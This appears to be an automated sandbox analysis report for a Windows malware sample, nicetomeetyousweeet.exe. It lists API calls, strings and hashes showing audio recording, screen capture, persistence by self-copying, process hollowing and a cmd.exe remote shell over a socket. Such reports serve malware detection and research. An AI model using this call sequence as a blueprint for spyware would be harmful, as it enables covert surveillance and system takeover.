                                                                                • Opcode Fuzzy Hash: 1a0008a7b032c45d953091ac1afb4bf8007bf4c9a0a3f4b2fa71c5b2a3510a05
                                                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                • API String ID: 738084811-1408154895
                                                                                • Opcode ID: 83406c3b7a19171203d9cdb86f2d243da5116594bd3113cd46328f7e28b7c8f9
                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                • Opcode Fuzzy Hash: 83406c3b7a19171203d9cdb86f2d243da5116594bd3113cd46328f7e28b7c8f9
                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 0079153B
                                                                                • ExitProcess.KERNEL32 ref: 00791784
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 007915C2
                                                                                • OpenProcess.KERNEL32(00100000,00000000,0078E3BB,?,?,?,?,00000000), ref: 007915D1
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 007915DC
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 007915E3
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 007915E9
                                                                                  • Part of subcall function 00792A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
                                                                                  • Part of subcall function 00792A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
                                                                                  • Part of subcall function 00792A3C: RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0079161A
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 00791676
                                                                                • GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00791690
                                                                                • lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 007916A2
                                                                                  • Part of subcall function 0079B7F6: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B852
                                                                                  • Part of subcall function 0079B7F6: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B866
                                                                                  • Part of subcall function 0079B7F6: CloseHandle.KERNEL32(00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B873
                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0079172B
                                                                                • OpenProcess.KERNEL32(00100000,00000000,0078E3BB,?,?,?,?,00000000), ref: 00791740
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0079174B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 00791752
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00791758
                                                                                  • Part of subcall function 0079B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0079B90C,00000000,00000000,?), ref: 0079B835
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
                                                                                • String ID: 0DG$@CG$WDH$exepath
                                                                                • API String ID: 1212092484-1464086911
                                                                                • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                • Instruction ID: 5678d2f98de9078b36884e3e96b75136aeddb1d592d6716cb0e0cb76cc7f226d
                                                                                • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                • Instruction Fuzzy Hash: 7251C471A44306ABDF10B7A0BC89EFE336D9B44751F5041A5F901A71D3EF788E428B58
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000001,004068B2,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                • API String ID: 1646373207-3984297062
                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                APIs
                                                                                • CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 00798220
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0079822B
                                                                                  • Part of subcall function 007986B9: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 007986E9
                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 007982AC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 007982D2
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 007982FA
                                                                                • GetCursorInfo.USER32(?), ref: 0079831C
                                                                                • GetIconInfo.USER32(?,?), ref: 00798332
                                                                                • DeleteObject.GDI32(?), ref: 00798361
                                                                                • DeleteObject.GDI32(?), ref: 0079836E
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 0079837B
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 007983AB
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 007983DA
                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 00798423
                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00798446
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 007984AF
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007984D2
                                                                                • DeleteObject.GDI32(00000000), ref: 007984EC
                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 007984F7
                                                                                • DeleteObject.GDI32(00000000), ref: 007985AB
                                                                                • GlobalFree.KERNEL32(?), ref: 007985B2
                                                                                • DeleteObject.GDI32(?), ref: 00798608
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                • String ID:
                                                                                • API String ID: 615876539-0
                                                                                • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                • Instruction ID: d9fbfeba100e9c807be759a73419f1d13616c7579a26747eb59fc4cd895b7eab
                                                                                • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                • Instruction Fuzzy Hash: 39C17B71508345AFD7609F24EC48B6BBBE8FF85741F04082DF989972A2DB34E904CB56
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000000,00000000), ref: 0040BDF2
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                • String ID: 6$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$del$open$BG$BG
                                                                                • API String ID: 1579085052-2367752573
                                                                                • Opcode ID: 771e636904fad5e3248d91ed26e8a99c9c578bafc1c6ca04f7ca2b005c5ac86a
                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                • Opcode Fuzzy Hash: 771e636904fad5e3248d91ed26e8a99c9c578bafc1c6ca04f7ca2b005c5ac86a
                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                • String ID: ?
                                                                                • API String ID: 3941738427-1684325040
                                                                                • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?), ref: 0079B43D
                                                                                • _memcmp.LIBVCRUNTIME ref: 0079B455
                                                                                • lstrlenW.KERNEL32(?), ref: 0079B46E
                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0079B4A9
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0079B4BC
                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0079B500
                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0079B51B
                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0079B533
                                                                                • _wcslen.LIBCMT ref: 0079B542
                                                                                • FindVolumeClose.KERNEL32(?), ref: 0079B562
                                                                                • GetLastError.KERNEL32 ref: 0079B57A
                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0079B5A7
                                                                                • lstrcatW.KERNEL32(?,?), ref: 0079B5C0
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0079B5CF
                                                                                • GetLastError.KERNEL32 ref: 0079B5D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                • String ID: ?
                                                                                • API String ID: 3941738427-1684325040
                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                • Instruction ID: 3353b64b0df217421d8402333b0ac89e2c0f14eb883bcfa989447fef4c9556ac
                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                • Instruction Fuzzy Hash: EF418171508705ABDB20DFA4FD88AAB77ECAB44711F00093AF541C2261EB78CA58DB92
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                                                • String ID:
                                                                                • API String ID: 2719235668-0
                                                                                • Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                • Instruction ID: 4798b02fca99f6b0d8200ab66e1e80696e9d385fadd738a155b24aaeb7fb5c09
                                                                                • Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                • Instruction Fuzzy Hash: E0D12A71A00304AFDF25AF78AC86F6E7BE59F00324F04416DF94697291EA3E9E41CB91
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007975D3
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 007975EB
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00797601
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00797627
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007976A7
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 007976BB
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 007976F2
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 007977BF
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 007977DC
                                                                                • ResumeThread.KERNEL32(?), ref: 007977E9
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00797801
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0079780C
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00797826
                                                                                • GetLastError.KERNEL32 ref: 0079782E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                • String ID: ntdll
                                                                                • API String ID: 3275803005-3337577438
                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                • Instruction ID: 99766ae46b3347909346405703ceaf0fb3f0a973029b7582a322a2eedb86695c
                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                • Instruction Fuzzy Hash: 68A16C71518304AFDB149F65EC49F6B7BE8FF48345F000829F689C6261E779E844CB69
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 007852F5
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • __Init_thread_footer.LIBCMT ref: 00785332
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 0078544E
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 007854A6
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007854CB
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 007854F8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 007855F5
                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 0078560F
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00785628
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterFileInit_thread_footerLeaveProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$cmd.exe
                                                                                • API String ID: 121539554-3292008770
                                                                                • Opcode ID: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                                                • Instruction ID: b4f6e161479d183872e33658946139ed6530ec3ef655def89f5185ced9fd036a
                                                                                • Opcode Fuzzy Hash: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                                                • Instruction Fuzzy Hash: C9912C71680704EFD711BB24ED89F6E3799EB40341F50403DF909AE1A2EEAC9C448769
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 3899193279-0
                                                                                • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
